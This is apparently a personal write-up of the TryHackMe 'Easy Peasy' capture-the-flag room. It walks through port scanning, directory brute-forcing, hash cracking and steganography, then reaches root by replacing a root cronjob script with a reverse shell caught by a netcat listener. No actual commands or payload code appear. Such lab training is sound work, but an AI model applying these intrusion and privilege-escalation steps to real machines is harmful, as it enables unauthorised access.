EasyPeasy
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Try this challenge in TryHackMe: Easy Peasy
I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: TryHackMe: Easy Peasy Write-up by Kevin De Vijlder
Task 1: Enumeration through Nmap
1.1 How many ports are open?
Let's run a nmap scan to check the open ports on the IP assigned to us. Just replace the 10.10.X.X to the IP given to you.
-sT (TCP connect scan)
To answer the next two questions, we’ll be running a nmap scan for the open ports:
1.2 What is the version of nginx?
1.3 What is running on the highest port?
Task 2: Compromising the machine
2.1 Using GoBuster, find flag 1.
Run gobuster for http://10.10.X.X/
We found out that there is a /hidden directory. Let's try to run gobuster for http://10.10.X.X/hidden
Go to http://10.10.X.X/hidden/whatever
Copy the hidden hash
To decrypt the hash, go to an online decrypter like https://hashes.com/en/decrypt/hash for faster results
2.2 Further enumerate the machine, what is flag 2?
Run gobuster for http://10.10.X.X:65524
Check 10.10.X.X:65524/robots.txt
In the User-Agent field, there’s a hash
To find the type of the hash, use hash-identifier module
Decrypt hash using an online MD5 decrypter
2.3 Crack the hash with easypeasy.txt, What is the flag 3?
From our nmap scan, go to http://10.10.X.X:65524
Flag 3 is written in plain sight on the web page
2.4 What is the hidden directory?
When you View the Page Source of http://10.10.X.X:65524, a hidden field will be seen that has a hash.
We’ll use CyberChef to decrypt hash from Base6X (explore options available in CyberChef)
2.5 Using the wordlist that was provided to you in this task crack the hash what is the password?
When you go to the hidden directory, you’ll see a picture
Save the image with its default name
We’ll use steganography to decode the message in the image
But a passphrase is needed to decrypt this file
Let’s try to View the Page Source of the image page to get some clues. We indeed retrieved a hash.
Save the hash using the filename hash.txt
To decrypt the hash, use the johntheripper module
2.6 What is the password to login to the machine via SSH?
Going back to the steghide module, enter the passphrase that we got.
A file secrettext.txt was extracted. Use this to view the contents of the file.
We’ll get a username boring and binary numbers that need to be decrypted
Use a Binary to Text converter tool online like this:
https://www.rapidtables.com/convert/number/binary-to-ascii.html
2.7 What is the user flag?
From our previous nmap scan, we’ll use the port 6498 for the ssh access
From the Hint, we got the term “Rotated”, which suggests that this may be encrypted with ROT13. Using CyberChef, we decrypt the flag.
2.8 What is the root flag?
From the description of this room, we are expected to escalate our privileges through a vulnerable cronjob
The cron job is located in /var/www
We’ll see the cronjob mysecretcronjob.sh that said that will run as root.
We can set up a netcat listener in our machine to have a reverse shell since the cronjob has root privileges.
Let's craft our payload:
Get the reverse shell script from pentestmonkey's reverse shell cheat sheet then replace the contents of mysecretcronjob.sh
*use your machine IP & port 5556
Let's now wait for the cronjob to be executed to receive a shell
We can see the flag in the .root.txt file.
Last updated
